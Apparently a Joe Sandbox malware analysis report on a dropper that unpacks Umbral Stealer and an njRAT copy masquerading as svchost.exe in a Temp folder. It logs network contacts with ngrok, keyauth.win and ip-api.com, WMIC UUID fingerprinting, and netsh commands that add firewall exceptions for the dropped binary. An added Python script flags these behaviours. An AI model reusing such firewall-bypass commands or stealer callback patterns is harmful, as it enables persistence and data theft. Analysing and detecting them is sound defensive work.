                                                                      Apr 20, 2024 21:32:01.746205091 CEST | 192.168.2.4 | 1.1.1.1 | 0x73e7 | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:33:31.014870882 CEST | 192.168.2.4 | 1.1.1.1 | 0x95b7 | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:34:42.593089104 CEST | 192.168.2.4 | 1.1.1.1 | 0x74cc | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:35:55.030271053 CEST | 192.168.2.4 | 1.1.1.1 | 0xd0a2 | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
                                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                      Apr 20, 2024 21:31:58.969345093 CEST | 1.1.1.1 | 192.168.2.4 | 0xa909 | No error (0) | keyauth.win | | 104.26.0.5 | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:31:58.969345093 CEST | 1.1.1.1 | 192.168.2.4 | 0xa909 | No error (0) | keyauth.win | | 104.26.1.5 | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:31:58.969345093 CEST | 1.1.1.1 | 192.168.2.4 | 0xa909 | No error (0) | keyauth.win | | 172.67.72.57 | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:31:59.678761959 CEST | 1.1.1.1 | 192.168.2.4 | 0x4c8c | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:32:01.853766918 CEST | 1.1.1.1 | 192.168.2.4 | 0x73e7 | No error (0) | 0.tcp.eu.ngrok.io | | 18.158.249.75 | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:33:31.136111021 CEST | 1.1.1.1 | 192.168.2.4 | 0x95b7 | No error (0) | 0.tcp.eu.ngrok.io | | 3.125.209.94 | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:34:42.701293945 CEST | 1.1.1.1 | 192.168.2.4 | 0x74cc | No error (0) | 0.tcp.eu.ngrok.io | | 3.125.223.134 | A (IP address) | IN (0x0001) | false
                                                                      Apr 20, 2024 21:35:55.138322115 CEST | 1.1.1.1 | 192.168.2.4 | 0xd0a2 | No error (0) | 0.tcp.eu.ngrok.io | | 3.124.142.205 | A (IP address) | IN (0x0001) | false
                                                                      • keyauth.win
                                                                      • ip-api.com
                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0 | 192.168.2.4 | 49734 | 208.95.112.1 | 80 | 2180 | C:\Users\user\AppData\Local\Temp\Umbral.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Apr 20, 2024 21:31:59.810339928 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Apr 20, 2024 21:31:59.926877022 CEST | 174 | IN | HTTP/1.1 200 OK
                                                                      Date: Sat, 20 Apr 2024 19:31:59 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 5
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 74 72 75 65 0a
                                                                      Data Ascii: true


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0 | 192.168.2.4 | 49733 | 104.26.0.5 | 443 | 2736 | C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-04-20 19:31:59 UTC | 162 | OUT | POST /api/1.0/ HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: keyauth.win
                                                                      Content-Length: 376
                                                                      Expect: 100-continue
                                                                      Connection: Keep-Alive
                                                                      2024-04-20 19:31:59 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                      2024-04-20 19:31:59 UTC | 376 | OUT | Data Raw: 74 79 70 65 3d 36 39 36 65 36 39 37 34 26 76 65 72 3d 61 66 62 32 31 63 30 32 65 30 66 30 35 32 34 35 34 30 64 61 34 64 37 37 35 65 32 34 33 37 31 34 26 68 61 73 68 3d 33 33 65 62 36 38 63 38 63 34 66 63 35 32 31 64 36 34 65 64 38 32 32 31 39 63 64 62 31 39 66 32 26 65 6e 63 6b 65 79 3d 34 35 39 66 32 37 63 33 61 36 36 66 33 31 38 66 38 34 31 66 38 34 34 61 61 61 37 66 66 36 61 65 35 63 36 32 66 30 39 65 35 32 32 30 63 30 34 34 62 61 65 34 39 64 61 35 35 31 39 39 64 66 38 38 64 32 66 33 37 61 34 32 65 31 64 39 63 62 39 65 31 65 64 31 36 32 61 66 61 30 63 64 63 36 66 37 38 37 61 36 63 37 33 63 63 36 34 37 64 65 66 66 33 61 36 39 38 35 34 61 35 31 31 35 61 65 31 61 37 62 31 63 34 33 63 38 62 66 66 33 30 62 38 38 35 61 62 33 66 32 61 64 38 34 65 39 66 30 31
                                                                      Data Ascii: type=696e6974&ver=afb21c02e0f0524540da4d775e243714&hash=33eb68c8c4fc521d64ed82219cdb19f2&enckey=459f27c3a66f318f841f844aaa7ff6ae5c62f09e5220c044bae49da55199df88d2f37a42e1d9cb9e1ed162afa0cdc6f787a6c73cc647deff3a69854a5115ae1a7b1c43c8bff30b885ab3f2ad84e9f01
                                                                      2024-04-20 19:31:59 UTC | 1369 | IN | HTTP/1.1 200 OK
                                                                      Date: Sat, 20 Apr 2024 19:31:59 GMT
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Content-Length: 832
                                                                      Connection: close
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Li6XG0ZqzFudsp0JmEgzEUJ3mp8ro3GKa%2BFSLWvEHBpX6xHIjac7n0%2BEtdA4UDgLRgZYVrrOf0Qt8bFPxc4ilnFJBCqAB4vpuKf%2FE9s3Lc2iNCp1vjQz%2FgwM6v1O"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Acknowledge: Credit to VaultCord.com
                                                                      X-Powered-By: VaultCord.com
                                                                      content-security-policy: upgrade-insecure-requests
                                                                      permissions-policy: accelerometer=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                      x-content-security-policy: img-src *; media-src * data:;
                                                                      x-content-type-options: nosniff
                                                                      x-frame-options: DENY
                                                                      x-xss-protection: 1; mode=block
                                                                      Access-Control-Allow-Headers: *
                                                                      Access-Control-Allow-Methods: *
                                                                      Access-Control-Allow-Origin: *
                                                                      Server: cloudflare
                                                                      CF-RAY: 87778ec849b353f2-ATL
                                                                      88f38867822eb239acd7c51c55e26acf60cecaf5ad84e332ac486f25539a1319d9c15322c226170ddbf4cbac5ce65ab36ae98b40aa514f2115ebfe0e4762655abd9ea32f8a044a5c4ce032fce55683e2a73c09f85a004419febd8dcfdc7ba882b8cbb19985c6d71ae48c53db366b7f1db6310a57b2fa733821ef859439455643d63682cf
                                                                      2024-04-20 19:31:59 UTC | 568 | IN | Data Raw: 66 63 31 30 33 30 34 66 31 30 33 35 30 33 61 31 38 61 38 38 63 62 62 66 37 32 64 66 63 31 65 62 38 34 35 65 66 30 34 38 39 66 31 30 64 61 31 38 37 64 64 65 33 62 61 64 39 35 33 30 36 38 65 31 64 31 62 38 32 31 30 35 64 62 39 35 35 38 64 32 36 34 64 61 66 34 64 32 33 64 63 63 36 35 38 36 34 37 36 65 64 65 61 62 31 34 63 63 34 37 33 34 33 63 64 63 38 62 34 39 64 38 64 63 37 61 61 30 38 31 63 64 64 34 62 36 32 65 34 35 64 38 38 34 65 63 38 39 64 32 37 62 34 35 65 30 62 35 31 66 37 34 63 65 37 31 64 30 63 31 33 62 34 36 36 34 31 32 39 62 38 37 33 34 62 38 34 66 65 34 32 33 34 64 33 65 62 30 36 61 62 39 31 66 34 39 37 38 61 63 66 61 39 62 37 62 64 64 63 36 30 64 61 66 31 37 64 62 30 61 32 66 38 30 39 34 61 62 39 30 36 37 66 35 63 32 61 62 34 38 32 61 63 33 36
                                                                      Data Ascii: fc10304f103503a18a88cbbf72dfc1eb845ef0489f10da187dde3bad953068e1d1b82105db9558d264daf4d23dcc6586476edeab14cc47343cdc8b49d8dc7aa081cdd4b62e45d884ec89d27b45e0b51f74ce71d0c13b4664129b8734b84fe4234d3eb06ab91f4978acfa9b7bddc60daf17db0a2f8094ab9067f5c2ab482ac36


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.4 | 49735 | 104.26.0.5 | 443 | 2736 | C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-04-20 19:32:00 UTC | 138 | OUT | POST /api/1.0/ HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: keyauth.win
                                                                      Content-Length: 162
                                                                      Expect: 100-continue
                                                                      2024-04-20 19:32:00 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                      2024-04-20 19:32:00 UTC | 162 | OUT | Data Raw: 74 79 70 65 3d 36 33 36 38 36 35 36 33 36 62 26 73 65 73 73 69 6f 6e 69 64 3d 33 38 36 35 36 31 33 36 36 33 33 32 33 31 36 35 26 6e 61 6d 65 3d 34 31 34 65 34 34 35 39 37 38 37 38 26 6f 77 6e 65 72 69 64 3d 34 31 34 32 37 61 36 34 37 37 37 30 36 37 36 33 34 39 36 31 26 69 6e 69 74 5f 69 76 3d 62 64 35 63 35 34 37 35 64 38 62 31 37 64 61 39 64 38 30 35 37 31 63 37 66 64 30 66 36 32 35 37 34 36 61 33 34 65 39 35 64 62 62 66 32 39 63 35 33 30 64 32 34 30 30 34 34 62 65 32 30 35 66 66
                                                                      Data Ascii: type=636865636b&sessionid=3865613663323165&name=414e44597878&ownerid=41427a64777067634961&init_iv=bd5c5475d8b17da9d80571c7fd0f625746a34e95dbbf29c530d240044be205ff
                                                                      2024-04-20 19:32:00 UTC | 1328 | IN | HTTP/1.1 200 OK
                                                                      Date: Sat, 20 Apr 2024 19:32:00 GMT
                                                                      Content-Type: text/plain;charset=UTF-8
                                                                      Content-Length: 224
                                                                      Connection: close
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wpf9Ze0KvHCndMv3XunuQSe3LNRImvMUERBT82N5D1jYSZa0HGsOgmnyCcLK8yfHHVtF3VsZmeOvdSx54%2F7lRd0r0ULwsYbyx7%2Bz%2BYkeyuVVa5eM%2FnK0nvhxANzY"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Acknowledge: Credit to VaultCord.com
                                                                      X-Powered-By: VaultCord.com
                                                                      content-security-policy: upgrade-insecure-requests
                                                                      permissions-policy: accelerometer=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                      x-content-security-policy: img-src *; media-src * data:;
                                                                      x-content-type-options: nosniff
                                                                      x-frame-options: DENY
                                                                      x-xss-protection: 1; mode=block
                                                                      Access-Control-Allow-Headers: *
                                                                      Access-Control-Allow-Methods: *
                                                                      Access-Control-Allow-Origin: *
                                                                      Server: cloudflare
                                                                      CF-RAY: 87778ecda8ebb056-ATL
                                                                      47d7c699d1e209ca269c8904b14cb1dfcaaebe989de10b3658d79d518e66d0068135fe863de4d340d1cd9b80420503eb54e7f50f676a155ed52f265f222b0bdc8bc377eb3ab08b86ffcfabe90e2c76a27b2fddad766bf2883a12b5425dcb93f80dd5d4c7d33dcb6c521a71a8f842b4de


                                                                      Target ID:0
                                                                      Start time:21:31:52
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\Desktop\KvS2rT08PQ.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\KvS2rT08PQ.exe"
                                                                      Imagebase:0x150000
                                                                      File size:2'447'360 bytes
                                                                      MD5 hash:2784277BD68152ABF75C6C6D59FAB7AF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:21:31:55
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                                                      Imagebase:0x253f8f30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:774FA31E76AF56BBAD395E1E3AC68721
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 88%, ReversingLabs
                                                                      • Detection: 70%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:21:31:55
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                                      Imagebase:0xe00000
                                                                      File size:95'232 bytes
                                                                      MD5 hash:3071F4F7B11A6BF6C623E83EED6D2418
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Florian Roth
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 100%, ReversingLabs
                                                                      • Detection: 77%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:3
                                                                      Start time:21:31:55
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe"
                                                                      Imagebase:0x191c1be0000
                                                                      File size:2'581'504 bytes
                                                                      MD5 hash:33EB68C8C4FC521D64ED82219CDB19F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000000.1646530842.00000191C1C92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 50%, ReversingLabs
                                                                      • Detection: 65%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:5
                                                                      Start time:21:31:56
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"wmic.exe" csproduct get uuid
                                                                      Imagebase:0x7ff73bdc0000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:21:31:56
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:21:31:57
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
                                                                      Imagebase:0x1560000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:21:31:57
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                                      Imagebase:0x1560000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
                                                                      Imagebase:0x1560000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true
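
The process list above shows the three behaviours that a defender would want to catch from this sample's execution: a binary named svchost.exe running from %TEMP% instead of System32 (Target 2), netsh repeatedly deleting and re-adding a Windows Firewall exception for that Temp copy (Targets 7, 9, 10), and a WMI machine-UUID lookup (Target 5) of the kind stealers use as a host fingerprint. The following Python script is an added example, not code from the Joe Sandbox report or from the malware: it parses the report's Key:Value process records and flags those three patterns. The system-process name list, the user-writable directory markers, and the coverage of the newer "netsh advfirewall firewall add rule ... program=" syntax (not seen on this page) are the example's own assumptions; the sample input is an excerpt of the records above.

```python
"""Flag the process behaviours seen above from report-style records.
Added example; not Joe Sandbox or malware code."""
import re
from dataclasses import dataclass

# Windows binaries whose names malware borrows; genuine copies live only under
# System32/SysWOW64 (assumed list, not taken from the report).
SYSTEM_PROCESS_NAMES = {
    "svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
    "services.exe", "smss.exe", "wininit.exe", "explorer.exe", "dllhost.exe",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Locations a standard user can write to (assumed list).
USER_WRITABLE_MARKERS = (
    "\\appdata\\local\\temp\\", "\\appdata\\local\\", "\\appdata\\roaming\\",
    "\\users\\public\\", "\\desktop\\", "\\downloads\\", "\\programdata\\",
)

# Legacy "netsh firewall" syntax (seen above) and the newer "netsh advfirewall"
# rule syntax (not on this page; assumed form, included for completeness).
NETSH_LEGACY = re.compile(
    r'netsh\s+firewall\s+(add|delete)\s+allowedprogram\s+(?:program=)?(?:"([^"]+)"|(\S+))',
    re.IGNORECASE,
)
NETSH_ADV = re.compile(
    r'netsh\s+advfirewall\s+firewall\s+(add|delete)\s+rule\b.*?\bprogram=(?:"([^"]+)"|(\S+))',
    re.IGNORECASE,
)
WMIC_UUID = re.compile(r"\bcsproduct\b.*\buuid\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    target_id: int
    rule: str
    detail: str


def is_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def check_process(target_id: int, path: str, commandline: str) -> list[Finding]:
    """Apply the three checks to one process record."""
    findings: list[Finding] = []
    image = path.rsplit("\\", 1)[-1].lower()

    # 1. A system-process name executing outside System32/SysWOW64
    #    (the dropped Temp\svchost.exe above).
    if image in SYSTEM_PROCESS_NAMES and not path.lower().startswith(SYSTEM_DIRS):
        findings.append(Finding(target_id, "system_name_unsuspected_location", path))

    # 2. A firewall exception whose program path is user-writable. Both add and
    #    delete are reported, since the sample removes and re-adds its own rule.
    if image == "netsh.exe":
        for pattern in (NETSH_LEGACY, NETSH_ADV):
            m = pattern.search(commandline)
            if m:
                program = m.group(2) or m.group(3)
                if is_user_writable(program):
                    findings.append(Finding(
                        target_id, f"firewall_exception_{m.group(1).lower()}", program))
                break

    # 3. Machine UUID lookup via WMI, a common stealer host fingerprint.
    if image == "wmic.exe" and WMIC_UUID.search(commandline):
        findings.append(Finding(target_id, "wmic_machine_uuid", commandline))
    return findings


def parse_report(text: str) -> list[dict[str, str]]:
    """Split 'Key:Value' lines into records; a blank line ends a record."""
    records: list[dict[str, str]] = []
    current: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def scan(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for rec in parse_report(text):
        findings.extend(check_process(
            int(rec["Target ID"]), rec.get("Path", ""), rec.get("Commandline", "")))
    return findings


# Sample input: Target IDs 2, 5, 6, 7 and 9 copied from the process list above.
SAMPLE_REPORT = r"""
Target ID:2
Path:C:\Users\user\AppData\Local\Temp\svchost.exe
Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"

Target ID:5
Path:C:\Windows\System32\wbem\WMIC.exe
Commandline:"wmic.exe" csproduct get uuid

Target ID:6
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Target ID:7
Path:C:\Windows\SysWOW64\netsh.exe
Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE

Target ID:9
Path:C:\Windows\SysWOW64\netsh.exe
Commandline:netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_REPORT):
        print(f"[{f.rule}] target {f.target_id}: {f.detail}")
```

Running the script against the excerpt yields four findings (Targets 2, 5, 7 and 9) and none for the legitimate conhost.exe in System32. The same checks map onto live telemetry by feeding process-creation events (image path plus command line) into check_process instead of the report parser.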

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16e2f8d2a9a8d4d74b9a110e8326f6dd3c021d50a57ae7d3201b58eaa29bccfa
                                                                        • Instruction ID: 39dfcdf312036720f6eab799e7d345ca928adb2dcaeffa267a1bdfd4d7c785e0
                                                                        • Opcode Fuzzy Hash: 16e2f8d2a9a8d4d74b9a110e8326f6dd3c021d50a57ae7d3201b58eaa29bccfa
                                                                        • Instruction Fuzzy Hash: 5FD16130B2991D4FDBA9EB68D464ABE73E2FF58711B110639E42AC32E5CE34A9418740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DS^I$3CO_^
                                                                        • API String ID: 0-558954139
                                                                        • Opcode ID: a8cb1c4f61e0f77a1f45d24c35d2c42ffa6b5d4979f2ab6cc24f9abe7c9d2180
                                                                        • Instruction ID: 0b5bcffbd95d0ee84e44a66b4d2b1721a111d2687aede45c11794785f3a6d951
                                                                        • Opcode Fuzzy Hash: a8cb1c4f61e0f77a1f45d24c35d2c42ffa6b5d4979f2ab6cc24f9abe7c9d2180
                                                                        • Instruction Fuzzy Hash: 5A411953A0FED60FF67357AC2C310A92F94AF5561875A40FBD0E84B0EBA954AD0683C5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
